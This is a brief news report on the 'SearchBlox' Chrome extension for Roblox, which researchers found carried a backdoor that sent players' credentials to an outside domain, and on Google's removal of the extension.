Google Chrome extensions for Roblox contain a backdoor. More than 200 thousand players are under threat.
BleepingComputer researchers have discovered that the "SearchBlox" Chrome browser extension, installed over 200,000 times, contains a backdoor that can steal Roblox credentials as well as assets on the Roblox Rolimons trading platform. According to experts, the backdoor was introduced either by the developer himself or during a compromise.
There are two search results for "SearchBlox" in Chrome. According to the description, these extensions allow you to "search Roblox servers for the right player instantly." Researchers' analysis showed that they both contain a backdoor
When decoded, the code exfilters the Roblox credentials to another domain: "releasethen.site".
Of note, "searchblox.site" and "releasethen.site" were registered in November on the same Hostinger web host. The code is also intended to view the player's profile on Rolimons.
As to whether the backdoor was introduced into the extension after being compromised by an attacker, or deliberately introduced by the developer, this remains to be determined in an authoritative manner.
Some Roblox players noticed that the inventory of user "Unstoppablelucent", allegedly the developer of the extension, increased overnight, and the account of user Rolimons under the nickname "ccfont" was deleted on November 23 due to "suspicious inventory transactions".
BleepingComputer has notified Google of malicious extensions. A Google spokesperson confirmed that these extensions have been removed and will be automatically removed from the computers on which they were installed.